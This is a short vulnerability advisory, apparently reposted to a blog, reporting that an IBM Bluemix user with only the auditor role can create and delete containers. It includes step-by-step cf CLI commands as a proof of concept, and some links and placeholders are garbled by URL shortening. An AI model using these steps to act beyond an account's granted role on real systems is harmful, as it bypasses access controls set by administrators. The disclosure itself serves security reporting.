# Date : 09/12/2016 # Author : Oscar Martinez # Tested on:cf version 6.22.1+6b7af9c-2016-09-24 / Docker version 1.12.3, build 6b644ec / API endpoint: http://ift.tt/QKImQk (API version: 2.54.0) API endpoint: http://ift.tt/QKImQk (API version: 2.54.0) # Vendor : IBM # Software : bluemix http://ift.tt/2cNOB18 # Vulnerability Description: It is assumed that a user with auditor role should not be able to create or delete containers. reference: http://ift.tt/2hmZbT8 But, a user with auditor role CAN create or delete containers using the cli CF. 1. Connect to bluemix using the cli CF with the user with "auditor" role. 1.1 cf login [-sso] 1.2 cf ic init 2. Show the images 2.1 cf ic images 3. Create the container 3.1 cf ic run --name broken_access_666 -p 8080 -m 512 http://ift.tt/2gIWYgT site]/[your image] example: cf ic run --name broken_access_666 -p 8080 -m 512 http://ift.tt/2hn0Ecf 4. Delete your container cf ic stop [your container] cf ic rm [your container] example: cf ic stop broken_access_666 cf ic rm broken_access_666 Time Line
Source: Gmail -> IFTTT-> Blogger
No comments:
Post a Comment